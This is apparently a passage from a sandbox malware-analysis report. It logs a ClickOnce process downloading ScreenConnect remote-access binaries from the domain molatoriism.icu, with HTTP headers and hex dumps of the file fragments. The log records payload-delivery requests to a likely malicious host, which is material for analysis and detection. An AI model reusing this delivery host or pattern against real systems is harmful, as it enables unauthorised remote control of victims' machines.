                                                                                                                                                                                                Data Ascii: (+(+(+(L-*bb0v"s(+}(N(OoPsQ(R&{iiX{{i(%{ii(%(S*J~4oT Zj*s*.~4oU*.~4oV*.~4oW*.~4
                                                                                                                                                                                                2024-11-07 16:56:19 UTC1369INData Raw: 00 7e 5e 00 00 0a 18 17 16 8d db 00 00 01 28 1e 00 00 2b 2a 5a 02 6f 75 01 00 0a 2c 0c 02 6f 76 01 00 0a 6f 77 01 00 0a 2a 16 2a ce 02 28 71 01 00 06 2d 06 73 78 01 00 0a 7a 7e b0 00 00 04 25 2d 17 26 7e af 00 00 04 fe 06 fd 02 00 06 73 51 01 00 0a 25 80 b0 00 00 04 73 79 01 00 0a 2a 00 1b 30 03 00 93 00 00 00 25 00 00 11 28 0d 01 00 06 1b 17 73 6d 01 00 0a 28 7a 01 00 0a 2c 06 73 7b 01 00 0a 7a 28 bf 00 00 06 12 00 28 01 02 00 06 2d 06 73 78 01 00 0a 7a 06 7e a1 00 00 04 25 2d 13 26 14 fe 06 49 02 00 06 73 72 01 00 0a 25 80 a1 00 00 04 16 8d db 00 00 01 28 2d 00 00 06 0b 07 28 95 00 00 06 0c 08 28 3a 00 00 06 28 97 00 00 06 0d 02 6f 7c 01 00 0a 13 04 de 1e 09 2c 06 09 6f 11 00 00 0a dc 08 2c 06 08 6f 11 00 00 0a dc 07 2c 06 07 6f 11 00 00 0a dc 11 04 2a
                                                                                                                                                                                                Data Ascii: ~^(+*Zou,ovow**(q-sxz~%-&~sQ%sy*0%(sm(z,s{z((-sxz~%-&Isr%(-((:(o|,o,o,o*


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                11192.168.2.949900104.21.96.1484437480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-07 16:56:23 UTC99OUTGET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
                                                                                                                                                                                                Host: molatoriism.icu
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                2024-11-07 16:56:23 UTC798INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 07 Nov 2024 16:56:23 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                CF-Cache-Status: BYPASS
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dOSQG4IThM9YQwIylo1x82%2BV5SrXsuOnqAcs8oAUlhOBfrB%2Bzr%2FAJPAK0KU5wg3CF2Nit5wlNE9InKvEcBvx%2BZh66DPDffRh04SC6IrJqWmUFcpqG%2FsQ%2BqLGcTqQInqXDA0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8deedb390b043aaf-DFW
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1307&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=714&delivery_rate=2350649&cwnd=244&unsent_bytes=0&cid=3c421b81028212f5&ts=747&x=0"
                                                                                                                                                                                                2024-11-07 16:56:23 UTC571INData Raw: 37 38 61 61 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 3c 99 98 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 fc 08 00 00 06 00 00 00 00 00 00 92 15 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 19 78 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00
                                                                                                                                                                                                Data Ascii: 78aaMZ@!L!This program cannot be run in DOS mode.$PEL{<"0 @ `x@
                                                                                                                                                                                                2024-11-07 16:56:23 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 44 00 00 0a 2a 1e 02 7b 45 00 00 0a 2a 56 02 28 46 00 00 0a 02 03 7d 44 00 00 0a 02 04 7d 45 00 00 0a 2a 00 00 13 30 03 00 41 00 00 00 01 00 00 11 03 75 31 00 00 1b 0a 02 06 2e 34 06 2c 2f 28 47 00 00 0a 02 7b 44 00 00 0a 06 7b 44 00 00 0a 6f 48 00 00 0a 2c 17 28 49 00 00 0a 02 7b 45 00 00 0a 06 7b 45 00 00 0a 6f 4a 00 00 0a 2a 16 2a 17 2a d2 20 7d f4 81 6f 20 29 55 55 a5 5a 28 47 00 00 0a 02 7b 44 00 00 0a 6f 4b 00 00 0a 58 20 29 55 55 a5 5a 28 49 00 00 0a 02 7b 45 00 00 0a 6f 4c 00 00 0a 58 2a 00 00 13 30 07 00 62 00 00 00 02 00 00 11 14 72 01 00 00 70 18 8d 11 00 00 01 25 16 02 7b 44 00 00 0a 0a 12 00 25 71 34 00 00 1b 8c 34 00 00 1b 2d 04 26 14 2b 0b fe 16 34 00
                                                                                                                                                                                                Data Ascii: {D*{E*V(F}D}E*0Au1.4,/(G{D{DoH,(I{E{EoJ*** }o )UUZ(G{DoKX )UUZ(I{EoLX*0brp%{D%q44-&+4
                                                                                                                                                                                                2024-11-07 16:56:23 UTC1369INData Raw: 7b 59 00 00 0a 6f 5f 00 00 0a 2a 16 2a 17 2a 00 00 00 13 30 03 00 79 00 00 00 00 00 00 00 20 7f 00 b1 02 20 29 55 55 a5 5a 28 47 00 00 0a 02 7b 55 00 00 0a 6f 4b 00 00 0a 58 20 29 55 55 a5 5a 28 49 00 00 0a 02 7b 56 00 00 0a 6f 4c 00 00 0a 58 20 29 55 55 a5 5a 28 5a 00 00 0a 02 7b 57 00 00 0a 6f 60 00 00 0a 58 20 29 55 55 a5 5a 28 5c 00 00 0a 02 7b 58 00 00 0a 6f 61 00 00 0a 58 20 29 55 55 a5 5a 28 5e 00 00 0a 02 7b 59 00 00 0a 6f 62 00 00 0a 58 2a 00 00 00 13 30 07 00 db 00 00 00 07 00 00 11 14 72 59 01 00 70 1b 8d 11 00 00 01 25 16 02 7b 55 00 00 0a 0a 12 00 25 71 34 00 00 1b 8c 34 00 00 1b 2d 04 26 14 2b 0b fe 16 34 00 00 1b 6f 4d 00 00 0a a2 25 17 02 7b 56 00 00 0a 0b 12 01 25 71 35 00 00 1b 8c 35 00 00 1b 2d 04 26 14 2b 0b fe 16 35 00 00 1b 6f 4d 00
                                                                                                                                                                                                Data Ascii: {Yo_***0y )UUZ(G{UoKX )UUZ(I{VoLX )UUZ(Z{Wo`X )UUZ(\{XoaX )UUZ(^{YobX*0rYp%{U%q44-&+4oM%{V%q55-&+5oM
                                                                                                                                                                                                2024-11-07 16:56:23 UTC1369INData Raw: 00 0a 58 20 29 55 55 a5 5a 28 49 00 00 0a 02 7b 6a 00 00 0a 6f 4c 00 00 0a 58 2a 00 00 13 30 07 00 62 00 00 00 02 00 00 11 14 72 46 03 00 70 18 8d 11 00 00 01 25 16 02 7b 69 00 00 0a 0a 12 00 25 71 34 00 00 1b 8c 34 00 00 1b 2d 04 26 14 2b 0b fe 16 34 00 00 1b 6f 4d 00 00 0a a2 25 17 02 7b 6a 00 00 0a 0b 12 01 25 71 35 00 00 1b 8c 35 00 00 1b 2d 04 26 14 2b 0b fe 16 35 00 00 1b 6f 4d 00 00 0a a2 28 4e 00 00 0a 2a 1e 02 7b 6b 00 00 0a 2a 1e 02 7b 6c 00 00 0a 2a 56 02 28 46 00 00 0a 02 03 7d 6b 00 00 0a 02 04 7d 6c 00 00 0a 2a 13 30 03 00 41 00 00 00 0c 00 00 11 03 75 44 00 00 1b 0a 02 06 2e 34 06 2c 2f 28 47 00 00 0a 02 7b 6b 00 00 0a 06 7b 6b 00 00 0a 6f 48 00 00 0a 2c 17 28 49 00 00 0a 02 7b 6c 00 00 0a 06 7b 6c 00 00 0a 6f 4a 00 00 0a 2a 16 2a 17 2a d2
                                                                                                                                                                                                Data Ascii: X )UUZ(I{joLX*0brFp%{i%q44-&+4oM%{j%q55-&+5oM(N*{k*{l*V(F}k}l*0AuD.4,/(G{k{koH,(I{l{loJ***
                                                                                                                                                                                                2024-11-07 16:56:23 UTC1369INData Raw: 2a 16 2a 17 2a d2 20 e4 8c e4 88 20 29 55 55 a5 5a 28 47 00 00 0a 02 7b 73 00 00 0a 6f 4b 00 00 0a 58 20 29 55 55 a5 5a 28 49 00 00 0a 02 7b 74 00 00 0a 6f 4c 00 00 0a 58 2a 00 00 13 30 07 00 62 00 00 00 02 00 00 11 14 72 45 06 00 70 18 8d 11 00 00 01 25 16 02 7b 73 00 00 0a 0a 12 00 25 71 34 00 00 1b 8c 34 00 00 1b 2d 04 26 14 2b 0b fe 16 34 00 00 1b 6f 4d 00 00 0a a2 25 17 02 7b 74 00 00 0a 0b 12 01 25 71 35 00 00 1b 8c 35 00 00 1b 2d 04 26 14 2b 0b fe 16 35 00 00 1b 6f 4d 00 00 0a a2 28 4e 00 00 0a 2a 1e 02 28 75 00 00 0a 2a 5e 02 28 75 00 00 0a 02 17 8d 32 02 00 01 25 16 03 9c 7d 20 00 00 04 2a 3a 02 28 75 00 00 0a 02 03 7d 20 00 00 04 2a 3a 02 28 75 00 00 0a 02 03 7d 21 00 00 04 2a 5e 02 28 75 00 00 0a 02 17 8d 33 02 00 01 25 16 17 9c 7d 22 00 00 04
                                                                                                                                                                                                Data Ascii: *** )UUZ(G{soKX )UUZ(I{toLX*0brEp%{s%q44-&+4oM%{t%q55-&+5oM(N*(u*^(u2%} *:(u} *:(u}!*^(u3%}"
                                                                                                                                                                                                2024-11-07 16:56:23 UTC1369INData Raw: 9d 00 00 0a 8c ab 00 00 01 a2 73 3f 02 00 06 a2 25 17 72 1e 07 00 70 1a 8d 9f 00 00 01 25 16 16 73 9e 00 00 0a 8c ac 00 00 01 a2 25 17 17 73 9e 00 00 0a 8c ac 00 00 01 a2 25 18 18 73 9e 00 00 0a 8c ac 00 00 01 a2 25 19 19 73 9e 00 00 0a 8c ac 00 00 01 a2 73 3f 02 00 06 a2 25 18 72 48 07 00 70 19 8d 9f 00 00 01 25 16 1a 73 9f 00 00 0a 8c ad 00 00 01 a2 25 17 1f 0c 73 9f 00 00 0a 8c ad 00 00 01 a2 25 18 1f 24 73 9f 00 00 0a 8c ad 00 00 01 a2 73 3f 02 00 06 a2 25 19 72 88 07 00 70 12 00 fe 15 27 00 00 01 06 8c 27 00 00 01 73 35 02 00 06 a2 2a 00 13 30 06 00 93 00 00 00 14 00 00 11 02 28 a0 00 00 0a 16 6f a1 00 00 0a 02 28 03 00 00 2b 17 fe 01 6f a2 00 00 0a 02 28 a0 00 00 0a 17 6f a1 00 00 0a 02 28 a0 00 00 0a 18 6f a1 00 00 0a 02 28 a0 00 00 0a 19 6f a1 00
                                                                                                                                                                                                Data Ascii: s?%rp%s%s%s%ss?%rHp%s%s%$ss?%rp''s5*0(o(+o(o(o(o
                                                                                                                                                                                                2024-11-07 16:56:23 UTC1369INData Raw: 00 0a 59 7d cc 00 00 0a 2b 14 03 03 7b cc 00 00 0a 12 09 28 d3 00 00 0a 58 7d cd 00 00 0a 12 09 28 d2 00 00 0a 02 6f d4 00 00 0a 13 0a 12 0a 28 d2 00 00 0a 32 31 04 1a 2e 04 04 1b 33 15 03 03 7b d1 00 00 0a 12 09 28 d2 00 00 0a 59 7d d0 00 00 0a 2a 03 03 7b d0 00 00 0a 12 09 28 d2 00 00 0a 58 7d d1 00 00 0a 2a 00 00 13 30 03 00 a6 00 00 00 19 00 00 11 02 03 04 28 85 04 00 06 0a 02 28 d5 00 00 0a 3a 90 00 00 00 06 1f 0a 33 1f 0f 01 28 cf 00 00 0a 02 28 d6 00 00 0a 0b 12 01 28 d2 00 00 0a 18 5b 30 03 1f 0d 2a 1f 10 2a 06 1f 0c 33 1f 0f 01 28 cb 00 00 0a 02 28 d6 00 00 0a 0b 12 01 28 d3 00 00 0a 18 5b 30 03 1f 0d 2a 1f 0e 2a 06 1f 0b 33 1f 0f 01 28 cf 00 00 0a 02 28 d6 00 00 0a 0b 12 01 28 d2 00 00 0a 18 5b 30 03 1f 0e 2a 1f 11 2a 06 1f 0f 33 1f 0f 01 28 cb
                                                                                                                                                                                                Data Ascii: Y}+{(X}(o(21.3{(Y}*{(X}*0((:3((([0**3((([0**3((([0**3(
                                                                                                                                                                                                2024-11-07 16:56:23 UTC1369INData Raw: 32 00 00 04 2a 22 02 03 7d 32 00 00 04 2a 1e 02 28 f7 00 00 0a 2a 22 02 16 28 57 02 00 06 2a 1e 02 7b 33 00 00 04 2a 22 02 03 7d 33 00 00 04 2a 00 13 30 06 00 2b 02 00 00 1e 00 00 11 03 28 e7 04 00 06 6f 84 00 00 0a 03 18 6f f8 00 00 0a 03 19 6f f9 00 00 0a 7e fa 00 00 0a 72 d0 07 00 70 6f fb 00 00 0a 39 29 01 00 00 7e fa 00 00 0a 72 16 08 00 70 28 fc 00 00 0a 0c 08 39 13 01 00 00 08 6f fd 00 00 0a 6c 08 6f fe 00 00 0a 6c 5b 0d 0e 04 13 04 16 13 05 38 ec 00 00 00 11 04 11 05 a3 21 00 00 01 13 06 09 12 06 28 ff 00 00 0a 6c 12 06 28 00 01 00 0a 6c 5b 32 5f 12 06 28 01 01 00 0a 0f 03 28 cb 00 00 0a 59 12 06 28 02 01 00 0a 0f 03 28 cf 00 00 0a 59 6c 23 00 00 00 00 00 00 e0 3f 12 06 28 00 01 00 0a 6c 12 06 28 ff 00 00 0a 6c 09 5b 59 5a 58 28 03 01 00 0a 12 06
                                                                                                                                                                                                Data Ascii: 2*"}2*(*"(W*{3*"}3*0+(ooo~rpo9)~rp(9olol[8!(l(l[2_((Y((Yl#?(l(l[YZX(
                                                                                                                                                                                                2024-11-07 16:56:23 UTC1369INData Raw: 4e 00 00 04 17 16 6f 21 01 00 0a 02 73 22 01 00 0a 28 e5 00 00 06 02 72 6e 08 00 70 17 28 23 01 00 0a 7d 49 00 00 04 02 72 90 08 00 70 17 28 23 01 00 0a 73 68 00 00 06 7d 4d 00 00 04 02 7e 98 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 14 07 00 06 73 24 01 00 0a 25 80 98 02 00 04 73 25 01 00 0a 7d 53 00 00 04 02 73 26 01 00 0a 7d 80 00 00 04 02 28 ae 00 00 06 02 fe 06 4f 01 00 06 73 27 01 00 0a 6f 28 01 00 0a 02 73 18 04 00 06 28 b5 00 00 06 02 28 b4 00 00 06 02 fe 06 50 01 00 06 73 29 01 00 0a 6f 2a 01 00 0a 02 28 b4 00 00 06 02 fe 06 51 01 00 06 73 2b 01 00 0a 6f 07 04 00 06 02 02 fe 06 f6 00 00 06 73 2c 01 00 0a 02 fe 06 f8 00 00 06 73 2d 01 00 0a 73 2e 01 00 0a 28 b9 00 00 06 02 02 fe 06 f7 00 00 06 73 2f 01 00 0a 73 07 02 00 06 28 b7 00 00 06 02 28 b6
                                                                                                                                                                                                Data Ascii: No!s"(rnp(#}Irp(#sh}M~%-&~s$%s%}Ss&}(Os'o(s((Ps)o*(Qs+os,s-s.(s/s((
                                                                                                                                                                                                2024-11-07 16:56:23 UTC1369INData Raw: 27 01 00 0a 6f 55 01 00 0a 11 07 6f 23 00 00 0a 2d df de 0c 11 07 2c 07 11 07 6f 22 00 00 0a dc 02 28 e0 00 00 06 28 1c 00 00 2b 6f 56 01 00 0a 13 08 2b 18 11 08 6f 57 01 00 0a 02 fe 06 01 01 00 06 73 1f 01 00 0a 6f 20 01 00 0a 11 08 6f 23 00 00 0a 2d df de 0c 11 08 2c 07 11 08 6f 22 00 00 0a dc 02 18 8d 55 02 00 01 25 16 1f 10 9e 25 17 1f 20 9e 7e 9b 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 17 07 00 06 73 58 01 00 0a 25 80 9b 02 00 04 28 1d 00 00 2b 28 1e 00 00 2b 28 1f 00 00 2b 7d 43 00 00 04 02 73 5a 01 00 0a 7d 44 00 00 04 7e aa 00 00 0a 6f 5b 01 00 0a 0a 06 39 86 00 00 00 02 73 5c 01 00 0a 7d 46 00 00 04 d0 9f 00 00 01 28 bf 00 00 0a 28 5d 01 00 0a 28 20 00 00 2b 13 09 06 18 8d 56 02 00 01 25 16 1f 2c 9d 25 17 1f 3b 9d 6f 5f 01 00 0a 13 0a 16 13 04
                                                                                                                                                                                                Data Ascii: 'oUo#-,o"((+oV+oWso o#-,o"U%% ~%-&~sX%(+(+(+}CsZ}D~o[9s\}F((]( +V%,%;o_


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                12192.168.2.949925104.21.96.1484437480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-07 16:56:27 UTC114OUTGET /Bin/ScreenConnect.Core.dll HTTP/1.1
                                                                                                                                                                                                Host: molatoriism.icu
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2024-11-07 16:56:27 UTC773INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 07 Nov 2024 16:56:27 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b7mcXIx0MOHCOQA37fmNSCcIvitKO9mGbe7Nx8L2CgQPtDJaznkrHlSKFJODTbCTQWc7xNE%2BmpZQQq9Z%2FK2FnIRGzXQ6Co1%2BmvKQ0hjRCFk1vQwhP6DhWnhKp7JcD%2F2KDjA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8deedb53bc282e21-DFW
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1498&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=705&delivery_rate=2397350&cwnd=245&unsent_bytes=0&cid=054502f623a80752&ts=603&x=0"
                                                                                                                                                                                                2024-11-07 16:56:27 UTC596INData Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a fa ad c1 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 58 08 00 00 06 00 00 00 00 00 00 ea 72 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 af 44 09 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00
                                                                                                                                                                                                Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$PELz" 0Xr D@
                                                                                                                                                                                                2024-11-07 16:56:27 UTC1369INData Raw: 00 00 1e 02 7b 3a 00 00 0a 2a 1e 02 7b 3b 00 00 0a 2a 56 02 28 3c 00 00 0a 02 03 7d 3a 00 00 0a 02 04 7d 3b 00 00 0a 2a 00 00 13 30 03 00 41 00 00 00 01 00 00 11 03 75 7e 00 00 1b 0a 02 06 2e 34 06 2c 2f 28 3d 00 00 0a 02 7b 3a 00 00 0a 06 7b 3a 00 00 0a 6f 3e 00 00 0a 2c 17 28 3f 00 00 0a 02 7b 3b 00 00 0a 06 7b 3b 00 00 0a 6f 40 00 00 0a 2a 16 2a 17 2a d2 20 1f 0f eb a8 20 29 55 55 a5 5a 28 3d 00 00 0a 02 7b 3a 00 00 0a 6f 41 00 00 0a 58 20 29 55 55 a5 5a 28 3f 00 00 0a 02 7b 3b 00 00 0a 6f 42 00 00 0a 58 2a 00 00 13 30 07 00 62 00 00 00 02 00 00 11 14 72 01 00 00 70 18 8d 0d 00 00 01 25 16 02 7b 3a 00 00 0a 0a 12 00 25 71 81 00 00 1b 8c 81 00 00 1b 2d 04 26 14 2b 0b fe 16 81 00 00 1b 6f 43 00 00 0a a2 25 17 02 7b 3b 00 00 0a 0b 12 01 25 71 82 00 00 1b
                                                                                                                                                                                                Data Ascii: {:*{;*V(<}:};*0Au~.4,/(={:{:o>,(?{;{;o@*** )UUZ(={:oAX )UUZ(?{;oBX*0brp%{:%q-&+oC%{;%q
                                                                                                                                                                                                2024-11-07 16:56:27 UTC1369INData Raw: 25 71 82 00 00 1b 8c 82 00 00 1b 2d 04 26 14 2b 0b fe 16 82 00 00 1b 6f 43 00 00 0a a2 28 44 00 00 0a 2a 1e 02 28 4d 00 00 0a 2a 1e 02 28 4d 00 00 0a 2a 1e 02 28 4d 00 00 0a 2a 5e 02 28 4d 00 00 0a 02 17 8d b9 00 00 01 25 16 03 9c 7d 0b 00 00 04 2a 3a 02 28 4d 00 00 0a 02 03 7d 0b 00 00 04 2a 3a 02 28 4d 00 00 0a 02 03 7d 0c 00 00 04 2a 3a 02 28 4d 00 00 0a 02 03 7d 0d 00 00 04 2a 4e 03 02 7b 4e 00 00 0a 02 7b 4f 00 00 0a 73 50 00 00 0a 2a 4e 02 7b 51 00 00 0a 02 7b 52 00 00 0a 03 73 50 00 00 0a 2a 66 02 7b 53 00 00 0a 02 7b 54 00 00 0a 02 7b 55 00 00 0a 03 73 56 00 00 0a 2a 7e 02 7b 57 00 00 0a 02 7b 58 00 00 0a 02 7b 59 00 00 0a 02 7b 5a 00 00 0a 03 73 5b 00 00 0a 2a 96 02 7b 5c 00 00 0a 02 7b 5d 00 00 0a 02 7b 5e 00 00 0a 02 7b 5f 00 00 0a 02 7b 60 00
                                                                                                                                                                                                Data Ascii: %q-&+oC(D*(M*(M*(M*^(M%}*:(M}*:(M}*:(M}*N{N{OsP*N{Q{RsP*f{S{T{UsV*~{W{X{Y{Zs[*{\{]{^{_{`
                                                                                                                                                                                                2024-11-07 16:56:27 UTC1369INData Raw: 32 00 00 00 09 00 00 11 7f d3 01 00 04 02 7b 77 00 00 0a 28 02 00 00 2b 0a 12 00 02 7b 78 00 00 0a 28 03 00 00 2b 0a 12 00 02 7b 79 00 00 0a 28 04 00 00 2b 28 2c 06 00 06 2a b2 72 44 02 00 70 02 7b 77 00 00 0a 8c 81 00 00 1b 02 7b 78 00 00 0a 8c 82 00 00 1b 02 7b 79 00 00 0a 8c 9b 00 00 1b 28 80 00 00 0a 2a 7a 02 03 7d 81 00 00 0a 02 04 7d 82 00 00 0a 02 05 7d 83 00 00 0a 02 0e 04 7d 84 00 00 0a 2a 26 0f 00 03 28 85 00 00 0a 2a 32 0f 00 03 28 85 00 00 0a 16 fe 01 2a 32 0f 00 03 28 86 00 00 0a 16 fe 04 2a 32 0f 00 03 28 86 00 00 0a 16 fe 02 2a 3e 0f 00 03 28 86 00 00 0a 16 fe 02 16 fe 01 2a 3e 0f 00 03 28 86 00 00 0a 16 fe 04 16 fe 01 2a 00 13 30 03 00 61 00 00 00 00 00 00 00 28 3d 00 00 0a 02 7b 81 00 00 0a 03 7b 81 00 00 0a 6f 3e 00 00 0a 2c 47 28 3f 00
                                                                                                                                                                                                Data Ascii: 2{w(+{x(+{y(+(,*rDp{w{x{y(*z}}}}*&(*2(*2(*2(*>(*>(*0a(={{o>,G(?
                                                                                                                                                                                                2024-11-07 16:56:27 UTC1369INData Raw: 00 00 1b a2 25 19 02 7b 8f 00 00 0a 8c 9f 00 00 1b a2 25 1a 02 7b 90 00 00 0a 8c a3 00 00 1b a2 28 8b 00 00 0a 2a ba 02 03 7d 97 00 00 0a 02 04 7d 98 00 00 0a 02 05 7d 99 00 00 0a 02 0e 04 7d 9a 00 00 0a 02 0e 05 7d 9b 00 00 0a 02 0e 06 7d 9c 00 00 0a 2a 26 0f 00 03 28 9d 00 00 0a 2a 32 0f 00 03 28 9d 00 00 0a 16 fe 01 2a 32 0f 00 03 28 9e 00 00 0a 16 fe 04 2a 32 0f 00 03 28 9e 00 00 0a 16 fe 02 2a 3e 0f 00 03 28 9e 00 00 0a 16 fe 02 16 fe 01 2a 3e 0f 00 03 28 9e 00 00 0a 16 fe 04 16 fe 01 2a 00 13 30 03 00 91 00 00 00 00 00 00 00 28 3d 00 00 0a 02 7b 97 00 00 0a 03 7b 97 00 00 0a 6f 3e 00 00 0a 2c 77 28 3f 00 00 0a 02 7b 98 00 00 0a 03 7b 98 00 00 0a 6f 40 00 00 0a 2c 5f 28 7c 00 00 0a 02 7b 99 00 00 0a 03 7b 99 00 00 0a 6f 7d 00 00 0a 2c 47 28 87 00 00
                                                                                                                                                                                                Data Ascii: %{%{(*}}}}}}*&(*2(*2(*2(*>(*>(*0(={{o>,w(?{{o@,_(|{{o},G(
                                                                                                                                                                                                2024-11-07 16:56:27 UTC1369INData Raw: a2 00 00 0a 0a 06 2c 02 06 2a 28 ae 00 00 0a 02 7b a9 00 00 0a 03 7b a9 00 00 0a 6f af 00 00 0a 0a 06 2a 00 00 00 13 30 02 00 19 00 00 00 0e 00 00 11 03 75 a8 00 00 1b 2c 0f 03 a5 a8 00 00 1b 0a 02 06 28 aa 00 00 0a 2a 16 2a 00 00 00 13 30 02 00 6a 00 00 00 09 00 00 11 7f d3 01 00 04 02 7b a3 00 00 0a 28 02 00 00 2b 0a 12 00 02 7b a4 00 00 0a 28 03 00 00 2b 0a 12 00 02 7b a5 00 00 0a 28 04 00 00 2b 0a 12 00 02 7b a6 00 00 0a 28 05 00 00 2b 0a 12 00 02 7b a7 00 00 0a 28 06 00 00 2b 0a 12 00 02 7b a8 00 00 0a 28 07 00 00 2b 0a 12 00 02 7b a9 00 00 0a 28 08 00 00 2b 28 2c 06 00 06 2a 00 00 13 30 05 00 73 00 00 00 00 00 00 00 72 00 03 00 70 1d 8d 0d 00 00 01 25 16 02 7b a3 00 00 0a 8c 81 00 00 1b a2 25 17 02 7b a4 00 00 0a 8c 82 00 00 1b a2 25 18 02 7b a5 00
                                                                                                                                                                                                Data Ascii: ,*({{o*0u,(**0j{(+{(+{(+{(+{(+{(+{(+(,*0srp%{%{%{
                                                                                                                                                                                                2024-11-07 16:56:27 UTC1369INData Raw: 08 6f ec 00 00 0a 6f ed 00 00 0a 07 6f 11 00 00 0a 2d dd de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 2a 01 10 00 00 02 00 0d 00 27 34 00 0a 00 00 00 00 5a 1f fe 73 ee 00 00 0a 25 02 7d ef 00 00 0a 25 03 7d f0 00 00 0a 2a 3e 1f fe 73 f1 00 00 0a 25 02 7d f2 00 00 0a 2a 5a 1f fe 73 f3 00 00 0a 25 02 7d f4 00 00 0a 25 03 7d f5 00 00 0a 2a 00 00 1b 30 02 00 2c 00 00 00 16 00 00 11 16 0a 02 6f 19 00 00 0a 0b 2b 0b 07 6f 18 00 00 0a 0c 06 08 58 0a 07 6f 11 00 00 0a 2d ed de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 2a 01 10 00 00 02 00 09 00 17 20 00 0a 00 00 00 00 1b 30 03 00 32 00 00 00 17 00 00 11 16 0a 02 6f c8 00 00 0a 0b 2b 11 07 6f c9 00 00 0a 0c 06 03 08 6f f6 00 00 0a 58 0a 07 6f 11 00 00 0a 2d e7 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 2a 00 00 01 10 00 00 02 00
                                                                                                                                                                                                Data Ascii: ooo-,o*'4Zs%}%}*>s%}*Zs%}%}*0,o+oXo-,o* 02o+ooXo-,o*
